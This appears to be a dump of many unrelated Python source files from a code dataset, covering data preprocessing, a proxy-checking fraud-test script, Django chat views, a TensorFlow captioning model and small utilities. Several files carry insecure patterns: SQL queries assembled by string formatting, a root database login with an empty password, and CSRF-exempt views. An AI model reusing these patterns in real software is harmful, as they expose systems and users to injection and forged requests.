# 对于特征文件,这里可以读取到ndarray形式,二维
# 对于标签文件,这里可以读取到ndarray形式,一维
# print(type(data))
# print(data)
return data
def ReadLabels() -> np.ndarray:
"""
:return: 读入真实标签
"""
return ReadPkl("Data/experimental_train.pkl")
def ReadFeatures() -> np.ndarray:
"""
:return: 返回提供的数据集的Features
"""
return ReadPkl("Data/experimental_features.pkl")
def ReadAdj() -> scipy.sparse.csr.csr_matrix:
adj = ReadPkl("Data/experimental_adj.pkl")
return adj
def TestOutput():
# 543486 ~ 593486 is the target
x = []
y = []
data = []
for i in range(0, 500):
for j in range(0, 100):
# dst = random.randint(543486, 593485)
dst = 543486 + i * 100 + j
x.append(i)
y.append(dst)
# print(x, y)
# x.append(dst)
# y.append(i)
# data.append(1)
data.append(1)
adj = scipy.sparse.coo_matrix((data, (x, y)), shape=(500, 593986))
adj = adj.tocsr()
# print(np.transpose(adj[:, 593486:]) == adj[:, 593486:])
with open("adj.pkl", 'wb') as f: # 将数据写入pkl文件
pickle.dump(adj, f)
features = np.zeros((500, 100))
for i in range(0, 500):
for j in range(0, 100):
flag = random.randint(0, 1)
if flag == 0:
features[i][j] = 99.9
else:
features[i][j] = -99.9
print(features)
np.save("feature.npy", features)
# ReadPkl("Data/experimental_adj.pkl")
# ReadPkl("Data/experimental_features.pkl")
# ReadPkl("Data/experimental_train.pkl")
def readNpy(filename: str):
data = np.load(filename)
print(data)
if __name__ == '__main__':
TestOutput()
# readNpy("feature.npy") |
999,382 | 10da245f5a6120702894655446f8264fbca80d79 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# 研修用ユーザーのリストツール
#
# 機能
# このプログラムは、ソフトレイヤーのハンズオン研修用などの目的で、
# 子ユーザーのリストを表示します。
#
# 使い方
# 1. 初回実行時だけユーザーIDとAPI-KEYをインプットする
#
# 注意点
# ポータル画面に表示されなユーザーが表示される事があります。
#
# 作成者 Maho Takara takara@jp.ibm.com
#
# 2015/5/8 初版リリース
# 2015/8/13 ユーザーIDとAPI-KEYを初回実行時だけ入力する様に改良
import SoftLayer
import random
import string
import requests
import user_account as ua
#
#
# メイン
#
#
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings()
clt = ua.api_login()
if clt == False:
print "Failed: api_login()"
exit(1)
#
# 子ユーザーのリスト
#
try:
object_mask = 'id,username,firstName,lastName,sslVpnAllowedFlag,userStatusId'
ret = clt['Account'].getCurrentUser(mask=object_mask)
users = clt['SoftLayer_User_Customer'].getChildUsers(mask=object_mask,id=ret['id'])
except SoftLayer.SoftLayerAPIError as e:
print("faultCode=%s, faultString=%s" % (e.faultCode, e.faultString))
exit(1)
print "%-16s %-6s %-15s %-15s %-10s %-7s" % ("Username", "id", "firstName", "lastName","SSL_VPN","Status")
for user in users:
ret = clt['SoftLayer_User_Customer'].isMasterUser(id=user['id'])
if ret != True:
print "%-16s %-6d %-15s %-15s %-10s %-7s" % (user['username'],user['id'],user['firstName'],user['lastName'],user['sslVpnAllowedFlag'],user['userStatusId'])
#exit(0)
|
999,383 | 2233cfdcf1cbe8f06783c6bad39e25b77bd579c3 | # -*- coding: utf-8 -*-
"""preprocessing _kdd
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1TJSQ9_-XH7VOkFj1jfRUyPSUakLccq2b
"""
import pandas as pd
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
df = pd.read_csv('/content/drive/My Drive/kddcup99_csv.csv')
df.head()
df.describe()
import seaborn as sns
import matplotlib.pyplot as plt
#get correlations of each features in dataset
corrmat = df.corr()
top_corr_features = corrmat.index
plt.figure(figsize=(20,20))
#plot heat map
g=sns.heatmap(df[top_corr_features].corr(),annot=True,cmap="RdYlGn")
"""Removal of redundant features¶"""
df['lnum_outbound_cmds'].value_counts()
df.drop('lnum_outbound_cmds', axis=1, inplace=True)
df['is_host_login'].value_counts()
df.drop('is_host_login', axis=1, inplace=True)
df['wrong_fragment'].value_counts()
df.drop('wrong_fragment', axis=1, inplace=True)
df['hot'].value_counts()
df.drop('hot', axis=1, inplace=True)
df['num_failed_logins'].value_counts()
df.drop('num_failed_logins', axis=1, inplace=True)
df['logged_in'].value_counts()
df.drop('logged_in', axis=1, inplace=True)
df['lroot_shell'].value_counts()
df.drop('lroot_shell', axis=1, inplace=True)
df['lnum_file_creations'].value_counts()
df.drop('lnum_file_creations', axis=1, inplace=True)
df['lnum_shells'].value_counts()
df.drop('lnum_shells', axis=1, inplace=True)
df['lnum_access_files'].value_counts()
df.drop('lnum_access_files', axis=1, inplace=True)
df['is_guest_login'].value_counts()
df.drop('is_guest_login', axis=1, inplace=True)
df['serror_rate'].value_counts()
df.drop('serror_rate', axis=1, inplace=True)
df['srv_serror_rate'].value_counts()
df.drop('srv_serror_rate', axis=1, inplace=True)
df['rerror_rate'].value_counts()
df.drop('rerror_rate', axis=1, inplace=True)
df['srv_rerror_rate'].value_counts()
df.drop('srv_rerror_rate', axis=1, inplace=True)
df['same_srv_rate'].value_counts()
df.drop('same_srv_rate', axis=1, inplace=True)
df['diff_srv_rate'].value_counts()
df.drop('diff_srv_rate', axis=1, inplace=True)
df['srv_diff_host_rate'].value_counts()
df.drop('srv_diff_host_rate', axis=1, inplace=True)
df['dst_host_same_srv_rate'].value_counts()
df.drop('dst_host_same_srv_rate', axis=1, inplace=True)
df['dst_host_diff_srv_rate'].value_counts()
df.drop('dst_host_diff_srv_rate', axis=1, inplace=True)
df['dst_host_same_src_port_rate'].value_counts()
df.drop('dst_host_same_src_port_rate', axis=1, inplace=True)
df['dst_host_srv_diff_host_rate'].value_counts()
df.drop('dst_host_srv_diff_host_rate', axis=1, inplace=True)
df['dst_host_serror_rate'].value_counts()
df.drop('dst_host_serror_rate', axis=1, inplace=True)
df['dst_host_srv_serror_rate'].value_counts()
df.drop('dst_host_srv_serror_rate', axis=1, inplace=True)
df['dst_host_rerror_rate'].value_counts()
df.drop('dst_host_rerror_rate', axis=1, inplace=True)
df['dst_host_srv_rerror_rate'].value_counts()
df.drop('dst_host_srv_rerror_rate', axis=1, inplace=True)
df['lsu_attempted'].value_counts()
df.drop('lsu_attempted', axis=1, inplace=True)
df['urgent'].value_counts()
df.drop('urgent', axis=1, inplace=True)
#df['lnum_outbound_cmds'].value_counts()
#df.drop('lnum_outbound_cmds', axis=1, inplace=True)
#df['is_host_login'].value_counts()
#df.drop('is_host_login', axis=1, inplace=True)
df['protocol_type'] = df['protocol_type'].astype('category')
df['service'] = df['service'].astype('category')
df['flag'] = df['flag'].astype('category')
cat_columns = df.select_dtypes(['category']).columns
df[cat_columns] = df[cat_columns].apply(lambda x: x.cat.codes)
"""Removal of duplicates"""
df.drop_duplicates(subset=None, keep='first', inplace=True)
df.shape
df['label'].value_counts()
"""Log-scaled distribution of attacks"""
plt.clf()
plt.figure(figsize=(12,8))
params = {'axes.titlesize':'18',
'xtick.labelsize':'14',
'ytick.labelsize':'14'}
matplotlib.rcParams.update(params)
plt.title('Distribution of attacks')
#df.plot(kind='barh')
df['label'].value_counts().apply(np.log).plot(kind='barh')
plt.show()
"""KDD skewness and kurtosis"""
df.skew()
df.kurtosis()
"""Univariate histogramms"""
import matplotlib.pyplot as plt
import matplotlib
params = {'axes.titlesize':'28',
'xtick.labelsize':'24',
'ytick.labelsize':'24'}
matplotlib.rcParams.update(params)
df.hist(figsize=(50, 30), bins=20)
plt.show()
"""KDD standardization"""
df.shape
data = df.values
X = data[:, 0:13]
X
from sklearn.preprocessing import StandardScaler
sScaler = StandardScaler()
rescaleX = sScaler.fit_transform(X)
rescaleX
df_rescaled = pd.DataFrame(data=rescaleX)
df_rescaled.hist(figsize=(50, 30), bins=20)
plt.show()
"""KDD normalization¶"""
from sklearn.preprocessing import Normalizer
norm = Normalizer()
xNormalize = norm.fit_transform(X)
xNormalize
df_Normalized = pd.DataFrame(data=xNormalize)
df_Normalized.hist(figsize=(50, 30), bins=20)
plt.show()
"""Encoding"""
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
df['label'] = df['label'].astype('category')
cat_columns = df.select_dtypes(['category']).columns
df[cat_columns] = df[cat_columns].apply(lambda x: x.cat.codes)
data = df.values
Y = data[:,13]
X = data[:,0:14]
Y
X
X = np.transpose(X)
X
df.shape
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
pca.fit(X,Y)
pca.components_
pca.explained_variance_
pca.transform(X)
|
999,384 | ee1d847c961865f8348fac6607fac673a6ee2f42 | __all__ = ["type", "client", "typebuilder"] |
999,385 | da9035186710c9264b98ed38b1f427a1c4ed37b8 | while True:
print(input.acceleration(Dimension.X))
if input.acceleration(Dimension.X) > 17 or input.acceleration(Dimension.X) < -17:
light.show_animation(light.rainbow_animation, 100)
else:
light.clear() |
999,386 | 4b3aba265888afdcf1826876a7aac25dc6e609cd | import threading
import mysql.connector
import datetime
import urllib.request as urllib2
import time
db = mysql.connector.connect(
host="127.0.0.1",
user="root",
passwd="",
database="brofistool"
)
conn = db.cursor()
hasil_test = []
def data():
print("Proses Dimulai")
sql_apn = "SELECT apn FROM t_fraud_test_progress_detail WHERE suspect_fraud IS NULL GROUP BY apn"
conn.execute(sql_apn)
apns = conn.fetchall()
for apn in apns:
sql_proxy = "SELECT id,ip_address,url,port " \
"FROM t_fraud_test_progress_detail " \
"WHERE suspect_fraud IS NULL " \
"AND modem = 'modem-1' " \
"AND test_type = 'proxy tunneling' " \
"AND apn = '%s' " \
"LIMIT 10" % apn
conn.execute(sql_proxy)
proxys = conn.fetchall()
t = threading.Thread(target=proxy_check, args=[proxys])
t.start()
t.join()
print("Proses Selesai")
for hasil in hasil_test:
update = "UPDATE t_fraud_test_progress_detail " \
"SET suspect_fraud = '%s', " \
"started_at = '%s', " \
"finished_at = '%s' " \
"WHERE id = %s" % (hasil[3],hasil[1],hasil[2],hasil[0])
conn.execute(update)
db.commit()
def proxy_check(proxy):
print(threading.currentThread().getName(), 'Starting')
for data in proxy:
id = data[0]
ip = data[2]
if ip is None:
ip = data[1]
port = data[3]
if port is None:
port = 1080
address = str(ip) + ":" + str(port)
# print(address)
now = datetime.datetime.now()
started = now.strftime("%Y-%m-%d %H:%M:%S")
try:
proxy_handler = urllib2.ProxyHandler({'http': address})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://103.41.204.195/ping.php")
sock = urllib2.urlopen(req, timeout=10)
rs = sock.read(1000)
if rs is None:
proxy_result = "No"
else:
proxy_result = "Yes"
now = datetime.datetime.now()
finished = now.strftime("%Y-%m-%d %H:%M:%S")
except:
proxy_result = "No"
now = datetime.datetime.now()
finished = now.strftime("%Y-%m-%d %H:%M:%S")
isi_test = [id, started, finished, proxy_result]
hasil_test.append(isi_test)
print(threading.currentThread().getName(), 'Exiting')
data() |
999,387 | 92844ac7a8d0441b9576e4171c9294244cb68aae | import pandas as pd
import matplotlib.pyplot as plt
import datetime
import numpy as np
from clean_data import clean_data
"""
Calculate state's immobility index - a single number representing how much social
mobility declined during the COVID pandemic.
The following mobility variables were used:
retail_and_recreation, grocery_and_pharmacy, transit_stations, workplaces
Residential and parks were excluded given their inverse relationship with the pandemic.
Index calculated as the 4 variables' average across:
1. the 2 weeks immediately following the state's maximum stringency index
2. the 2 weeks in the middle of January 2021, as direct contrast with baseline
Parameters:
-----------
df (DataFrame): cleaned dataset for a particular state
Returns
-------
index (float): immobility index for state
"""
def immobility_index(df):
immobility_var = ["mobility_retail_and_recreation", "mobility_grocery_and_pharmacy", "mobility_transit_stations", "mobility_workplaces"]
max_strin = df.idxmax()["stringency_index"]
#2 weeks immediately following max stringency
days_range1 = list(pd.date_range(start=max_strin, end=max_strin + datetime.timedelta(days=14)))
#2 weeks in the middle of January 2021
days_range2 = list(pd.date_range(start = "2021-01-10", end = "2021-01-24"))
df_restricted = df.loc[days_range1+days_range2,:]
index = df_restricted.mean()[immobility_var].sum()/4
return index
"""
Creates immobility score by normalizing immobility indices. Higher the score, the more immobile the state.
Most immobile state will have a score of 100.
Not a strict normalization - least mobile state has a score > 0.
Parameters:
-----------
df (DataFrame): state immobility index DataFrame
Returns
-------
none, changes to df are made in-place
"""
def immobility_scores(df):
df["immobility_score"] = round((df["immobility_index"]/df["immobility_index"].min())*100, 1)
"""
Render the contents of a DataFrame as an image in table format. It turns out there's no
built-in way to do this. Credit for this function goes to the following StackExchange thread:
https://stackoverflow.com/questions/19726663/how-to-save-the-pandas-dataframe-series-data-as-a-figure
Parameters:
-----------
data (DataFrame): DataFrame to turn into an image
col_width (float): width of a single table column
row_height( float): height of a single table row
font_size (float): size of font
Returns
-------
fig, ax: figure and axis for rendered table image
"""
def render_mpl_table(data, col_width=3.0, row_height=0.625, font_size=14,
header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',
bbox=[0, 0, 1, 1], header_columns=0,
ax=None, **kwargs):
if ax is None:
size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])
fig, ax = plt.subplots(figsize=size, dpi=400)
ax.axis('off')
mpl_table = ax.table(cellText=data.values, bbox=bbox, colLabels=data.columns, cellLoc = "left", **kwargs)
mpl_table.auto_set_font_size(False)
mpl_table.set_fontsize(font_size)
for k, cell in mpl_table._cells.items():
cell.set_edgecolor(edge_color)
if k[0] == 0 or k[1] < header_columns:
cell.set_text_props(weight='bold', color='w')
cell.set_facecolor(header_color)
else:
cell.set_facecolor(row_colors[k[0]%len(row_colors) ])
return ax.get_figure(), ax
"""
Compare the 50 US states by how immobile they became as a result of the COVID pandemic.
First calculate an immobility index for each state based on mobility variables. Then an immobility score.
See function descriptions above for details.
Sort the states by immobility score (most immobile first) and saves the dataframe as image in table format.
Save entire table, top 10 states, and bottom 10 states as:
../img/state_comparison.png
../img/state_comparison_head.png
../img/state_comparison_tail.png
"""
if __name__ == "__main__":
mobility = ["mobility_retail_and_recreation", "mobility_grocery_and_pharmacy", "mobility_parks", "mobility_transit_stations", "mobility_workplaces", "mobility_residential"]
restrictions = ["school_closing", "workplace_closing", "cancel_public_events","restrictions_on_gatherings", "public_transport_closing", "stay_at_home_requirements", "restrictions_on_internal_movement", "stringency_index"]
virus = ["new_confirmed", "cumulative_persons_fully_vaccinated"]
#get the location keys for US states
index_df = pd.read_csv("../data/index.csv")
states_index = index_df.loc[(index_df.country_code == "US") & (index_df.aggregation_level==1), :]
state_keys = list(states_index["key"])
state_names=list(states_index["subregion1_name"])
#create data frame with state names and location keys, excluding non-state territories
data = {"key": state_keys, "name": state_names, "immobility_index":np.zeros(len(state_keys)), "avg_stringency":np.zeros(len(state_keys))}
state_df = pd.DataFrame(data).set_index("key")
state_df = state_df.drop(["US_AS", "US_GU", "US_MP", "US_PR", "US_VI", "US_DC"])
#calculate the immobility index for each state
for key in state_df.index:
print("Working on " + key)
df = pd.read_csv(f'https://storage.googleapis.com/covid19-open-data/v3/location/{key}.csv', parse_dates=["date"], index_col="date")
df = clean_data(df)
state_df.loc[key, "immobility_index"] = round(immobility_index(df),1)
state_df.loc[key, "avg_stringency"] = round((df["stringency_index"].max()+df["stringency_index"].loc["2021-01-15"])/2, 1)
#normalize the immobility indices into immobility scores
immobility_scores(state_df)
#sort by immobility score, descending
state_df = state_df.sort_values(by=["immobility_score"], ascending=False)
state_df=state_df[["name", "immobility_score", "immobility_index", "avg_stringency"]]
#save entire dataframe as table image
fig,ax = render_mpl_table(state_df, header_columns=0, col_width=3.5)
fig.savefig("../img/state_comparison.png", dpi=400, bbox_inches='tight')
#save the top 10 immobile states as table image
fig,ax = render_mpl_table(state_df.head(10), header_columns=0, col_width=3.5)
ax.set_title("Top 10 States by Immobility Score", fontsize=18, fontweight='bold')
fig.savefig("../img/state_comparison_head.png", dpi=400, bbox_inches='tight')
#save the bottom 10 immobile states as table image
fig,ax = render_mpl_table(state_df.tail(10), header_columns=0, col_width=3.5)
ax.set_title("Bottom 10 States by Immobility Score", fontsize=18, fontweight='bold')
fig.savefig("../img/state_comparison_tail.png", dpi=400, bbox_inches='tight') |
999,388 | 5bc047e6f779204eaacc333ada241bb7d769b682 | from setuptools import setup, find_packages
test_dependencies = [
'pytest',
'flake8',
]
extras = {
'tests': test_dependencies,
}
setup(
name='objconf',
version='0.3.0',
description='Object configuration for Python projects',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
url='https://github.com/milosta/objconf',
author='Miloslav Stanek',
author_email='milostanek@gmail.com',
packages=find_packages(exclude=['docs', 'tests']),
python_requires='>=3.6',
install_requires=[
'pyaml',
],
tests_require=test_dependencies,
extras_require=extras,
)
|
999,389 | 9c078270a4d410d14ee2cf2e3a38cd39b3ca47e5 | # -*- coding: utf-8 -*-
import math
def stripl(l):
"""
Strips all elements and removes the empty in a list.
"""
return filter(lambda x:x, map(lambda x: x.strip(), l))
def islice(n, m):
"""
An iterator splits an amount into several parts, each of which has the
length of m.
"""
npiece = int(math.ceil(1.0*n/m))
for i in range(npiece):
if (i+1)*m > n:
yield i, i*m, n
else:
yield i, i*m, (i+1)*m
def slice(n, m):
"""
Similar to `islice` but returns an list instead of an iterator.
"""
chunks = []
for piece in islice(n, m):
chunks.append(piece)
return chunks
def islicel(l, m):
"""
An iterator to return slices from the list, each slice has m elements
except for the last one.
"""
for i, start, end in islice(len(l), m):
yield i, l[start:end]
|
999,390 | e62d5fe26b7fdc65ccc31ce8f315a2088b024ac7 | # messaging/views.py
from django.http import JsonResponse, HttpResponse
from django.db.models import Count, Q
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from asgiref.sync import async_to_sync
from channels.layers import get_channel_layer
from . import models
from . import serializers
from userauth import models as userauth_models
@login_required
def load_inbox(request):
"""Load user inbox threads
- Retrieve all of the threads that includes the user in the clients filed.
- count number of unread messages using related ame receipts cpntaining user
- returns {"threads":[thread]}
"""
threads = models.MessageThread.objects.filter(clients=request.user).annotate(
unread_count=Count('receipts',filter=Q(receipts__recipient=request.user))
)
thread_data = serializers.MessageThreadListSerializer(threads).data
#user = userauth_models.User.objects.filter(username=request.user.username)
#print(user.username)
#print(get_channel_layer())
#print(request.session['channel_name'])
return JsonResponse({'threads':thread_data})
@login_required
def load_messages(request):
"""Load messages from thread
- Load 30 messages by default
- the 'before' parameter will load the last 30 messages relative to the date
- returns json {messages:[message], end:bool}
"""
thread = models.MessageThread.objects.get(hash_id=request.GET['id'])
# check if user is a part of this chat
if not request.user in thread.clients.all():
return HttpResponse(status=403)
# query for messages filter
q = [Q(thread=thread)]
if 'before' in request.GET:
q.append(Q(date__lt=int(request.GET['before'])))
# query messages matching filter
messages = models.Message.objects.filter(*q).order_by('-id')
messages_data = serializers.MessageListSerializer(messages[:30]).data
# mark any unread messages in chat as read
thread.mark_read(request.user)
return JsonResponse({"messages":messages_data,"end":messages.count() <= 30})
@login_required
@csrf_exempt
def add_chatroom(request):
"""Add user to chatroom
- create thread if existing one with title does not exist
- user is added to the chat as well as the channel_layer group using the channel_name
specified in the session
"""
title = request.POST['title'].strip()
psk = request.POST['psk']
# If thread already exists
if models.MessageThread.objects.filter(title=title).exists():
thread = models.MessageThread.objects.get(title=title)
if thread.psk != psk:
# Invalid passkey
thread = None
return HttpResponse(status=403)
# If the thread does not exist yet
else:
return HttpResponse(status=405)
if not request.user in thread.clients.all():
thread.clients.add(request.user)
channel_layer = get_channel_layer()
if 'channel_name' in request.session:
async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
return HttpResponse(status=200)
@login_required
@csrf_exempt
def create_chatroom(request):
title = request.POST['title'].strip()
psk = request.POST['psk']
if models.MessageThread.objects.filter(title=title).exists():
return HttpResponse(status=403)
else:
thread = models.MessageThread(title=title, psk=psk)
thread.save()
if not request.user in thread.clients.all():
thread.clients.add(request.user)
channel_layer = get_channel_layer()
if 'channel_name' in request.session:
async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
return HttpResponse(status=200)
@login_required
@csrf_exempt
def add_direct(request):
"""Create a direct message with another user
- search for friend
- create a thread for the direct message
- add user and friend to direct message
"""
friend = request.POST['friend'].strip()
if userauth_models.User.objects.filter(username=friend).exists():
friendUser = userauth_models.User.objects.get(username=friend)
elif userauth_models.User.objects.filter(phone_number=friend):
friendUser = userauth_models.User.objects.get(phone_number=friend)
elif userauth_models.User.objects.filter(email=friend):
friendUser = userauth_models.User.objects.get(email=friend)
else:
return HttpResponse(status=403) #no friend :(
threadName = request.user.username + friendUser.username
if models.MessageThread.objects.filter(title=threadName).exists():
thread = models.MessageThread.objects.get(title=threadName)
elif models.MessageThread.objects.filter(title=(friendUser.username + \
request.user.username)).exists():
thread = models.MessageThread.objects.get(title=(friendUser.username \
+ request.user.username))
else:
thread = models.MessageThread(title=threadName, psk=threadName, \
admin=request.user.username, friend1 = friendUser.username, is_direct=True)
#thread = models.MessageThread(title=threadName, psk=threadName)
thread.save()
if not request.user in thread.clients.all():
thread.clients.add(request.user)
#thread.clients.add(friendUser)
channel_layer = get_channel_layer()
if 'channel_name' in request.session:
async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
#if not friendUser in thread.clients.all():
# thread.clients.add(friendUser)
# channel_layer = get_channel_layer()
# if 'channel_name' in request.session:
# async_to_sync(channel_layer.group_add)(thread.hash_id,request.session['channel_name'])
thread_data = serializers.MessageThreadSerializer(thread).data
return HttpResponse(status=200)
|
999,391 | bc446ccb204ecfd0d716125f36e7ab610c79d722 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import math
import re
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
def sortPeople(p1,p2):
if p1[0] == p2[0]:
return cmp(p1[1],p2[1])
else:
return cmp(p2[0],p1[0])
people.sort(sortPeople)
res = []
for v in people:
res.insert(v[1],v)
return res
if __name__ == '__main__':
s = Solution()
print(s.reconstructQueue([[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]))
|
999,392 | 699b1fcc70928edcfdec97cfacce46947b4185c6 | import sys
sys.stdin = open("input.txt", "rt")
input = sys.stdin.readline
n = int(input())
for _ in range(n):
vps = input()
stack = []
for x in vps:
if x == '(':
stack.append(x)
elif x == ')':
if len(stack) != 0 and stack[-1] == "(":
stack.pop()
else:
stack.append(x)
break
if len(stack) == 0:
print("YES")
else:
print("NO") |
999,393 | de3c113674d7138a4709d0c5fa9e32a19f823d67 | # Generated by Django 4.0.2 on 2022-02-27 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='client',
old_name='created',
new_name='created_at',
),
migrations.AddField(
model_name='client',
name='updated_at',
field=models.DateTimeField(
auto_now=True, verbose_name='Updated at'
),
),
]
|
999,394 | 6245a367c07b01e17273997c87e1c52b4f567fbe | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Definition of a basic seq2seq model
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from seq2seq import graph_utils
from pydoc import locate
import tensorflow as tf
from seq2seq.contrib.seq2seq import helper as tf_decode_helper
from seq2seq.data import vocab
from seq2seq.models.seq2seq_model import Seq2SeqModel
from seq2seq.graph_utils import templatemethod
from seq2seq.models import bridges
from seq2seq.inference import beam_search
from seq2seq.encoders.conv_encoder_utils import linear_mapping_weightnorm
class VCAP_ConvSeq2Seq(Seq2SeqModel):
"""Basic Sequence2Sequence model with a unidirectional encoder and decoder.
The last encoder state is used to initialize the decoder and thus both
must share the same type of RNN cell.
Args:
source_vocab_info: An instance of `VocabInfo`
for the source vocabulary
target_vocab_info: An instance of `VocabInfo`
for the target vocabulary
params: A dictionary of hyperparameters
"""
def __init__(self, params, mode, name="vcap_conv_seq2seq"):
super(VCAP_ConvSeq2Seq, self).__init__(params, mode, name)
self.encoder_class = locate(self.params["encoder.class"])
self.decoder_class = locate(self.params["decoder.class"])
@staticmethod
def default_params():
params = Seq2SeqModel.default_params().copy()
params.update({
"encoder.class": "seq2seq.encoders.ConvEncoderFairseq",
"encoder.params": {}, # Arbitrary parameters for the encoder
"decoder.class": "seq2seq.decoders.ConvDecoder",
"decoder.params": {}, # Arbitrary parameters for the decoder
"source.max_seq_len": 50,
"source.reverse": False,
"feature.dim":2048,
"feature.shape":[30,2048],
"target.max_seq_len": 50,
"embedding.dim": 256,
"embedding.init_scale": 0.04,
"embedding.share": False,
"position_embeddings.num_positions": 100,
"inference.beam_search.beam_width": 0,
"inference.beam_search.length_penalty_weight": 1.0,
"inference.beam_search.choose_successors_fn": "choose_top_k",
"vocab_source": "",
"vocab_target": "",
"optimizer.name": "Momentum",
"optimizer.learning_rate": 0.25,
"optimizer.params": {"momentum": 0.99, "use_nesterov": True}, # Arbitrary parameters for the optimizer
#"optimizer.params": { "epsilon": 0.0000008}, # Arbitrary parameters for the optimizer
"optimizer.lr_decay_type": "exponential_decay",
"optimizer.lr_decay_steps": 5000, # one epoch steps
"optimizer.lr_decay_rate": 0.9,
"optimizer.lr_start_decay_at": 0, # start annealing epoch 0
"optimizer.lr_stop_decay_at": tf.int32.max,
"optimizer.lr_min_learning_rate": 1e-5,
"optimizer.lr_staircase": True,
"optimizer.clip_gradients": 0.1,
"optimizer.clip_embed_gradients": 5,
"optimizer.sync_replicas": 0,
"optimizer.sync_replicas_to_aggregate": 0,
})
return params
''' '''
def _preprocess(self, features, labels):
"""Model-specific preprocessing for features and labels:
In decoder pahse, the labels have add "END" and "START"
- Creates vocabulary lookup tables for target vocab
- Converts tokens into vocabulary ids
"""
# Create vocabulary look for target
target_vocab_to_id, target_id_to_vocab, target_word_to_count, _ = \
vocab.create_vocabulary_lookup_table(self.target_vocab_info.path)
# Add vocab tables to graph colection so that we can access them in
# other places.
graph_utils.add_dict_to_collection({
"target_vocab_to_id": target_vocab_to_id,
"target_id_to_vocab": target_id_to_vocab,
"target_word_to_count": target_word_to_count
}, "vocab_tables")
if labels is None:
return features, None
labels = labels.copy()
# Slices targets to max length
if self.params["target.max_seq_len"] is not None:
labels["target_tokens"] = labels["target_tokens"][:, :self.params[
"target.max_seq_len"]]
labels["target_len"] = tf.minimum(labels["target_len"],
self.params["target.max_seq_len"])
# Look up the target ids in the vocabulary
labels["target_ids"] = target_vocab_to_id.lookup(labels["target_tokens"])
labels["target_len"] = tf.to_int32(labels["target_len"])
tf.summary.histogram("target_len", tf.to_float(labels["target_len"]))
# Add to graph collection for later use
graph_utils.add_dict_to_collection(features, "features")
if labels:
graph_utils.add_dict_to_collection(labels, "labels")
return features, labels
def source_embedding_fairseq(self):
"""Returns the embedding used for the source sequence.
"""
return tf.get_variable(
name="W",
shape=[self.params["feature.dim"], self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def target_embedding_fairseq(self):
"""Returns the embedding used for the target sequence.
"""
if self.params["embedding.share"]:
return self.source_embedding_fairseq()
return tf.get_variable(
name="W",
shape=[self.target_vocab_info.total_size, self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def source_pos_embedding_fairseq(self):
return tf.get_variable(
name="pos",
shape=[self.params["position_embeddings.num_positions"], self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def target_pos_embedding_fairseq(self):
return tf.get_variable(
name="pos",
shape=[self.params["position_embeddings.num_positions"], self.params["embedding.dim"]],
initializer=tf.random_normal_initializer(
mean=0.0,
stddev=0.1))
def _create_decoder(self, encoder_output, features, _labels):
config = beam_search.BeamSearchConfig(
beam_width=self.params["inference.beam_search.beam_width"],
vocab_size=self.target_vocab_info.total_size,
eos_token=self.target_vocab_info.special_vocab.SEQUENCE_END,
length_penalty_weight=self.params[
"inference.beam_search.length_penalty_weight"],
choose_successors_fn=getattr(
beam_search,
self.params["inference.beam_search.choose_successors_fn"]))
return self.decoder_class(
params=self.params["decoder.params"],
mode=self.mode,
vocab_size=self.target_vocab_info.total_size,
config=config,
target_embedding=self.target_embedding_fairseq(),
pos_embedding=self.target_pos_embedding_fairseq(),
start_tokens=self.target_vocab_info.special_vocab.SEQUENCE_END)
def _decode_train(self, decoder, _encoder_output, _features, labels):
"""Runs decoding in training mode"""
target_embedded = tf.nn.embedding_lookup(decoder.target_embedding,
labels["target_ids"])
return decoder(_encoder_output, labels=target_embedded[:,:-1], sequence_length=labels["target_len"]-1)
def _decode_infer(self, decoder, _encoder_output, features, labels):
"""Runs decoding in inference mode"""
return decoder(_encoder_output, labels)
@templatemethod("encode")
def encode(self, features, labels):
# For video captioning, the model directly encoder the features from deep cnn with pos embedding.
source_embedded = linear_mapping_weightnorm(features['video'],self.params["embedding.dim"],\
var_scope_name="video_feat_mapping")
encoder_fn = self.encoder_class(self.params["encoder.params"], self.mode, None)
return encoder_fn(source_embedded, self.params["feature.shape"][0])
@templatemethod("decode")
def decode(self, encoder_output, features, labels):
decoder = self._create_decoder(encoder_output, features, labels)
if self.mode == tf.contrib.learn.ModeKeys.INFER:
return self._decode_infer(decoder, encoder_output, features,
labels)
else:
return self._decode_train(decoder, encoder_output, features,
labels)
|
999,395 | c0b8b973e6b942d1b558f0ec3007434950cb563a | from .abstract_pdf_constructor import AbstractQuantilePdfConstructor
from .cdf_spline_derivative import CdfSplineDerivative
from .dual_spline_average import DualSplineAverage
from .piecewise_constant import PiecewiseConstant
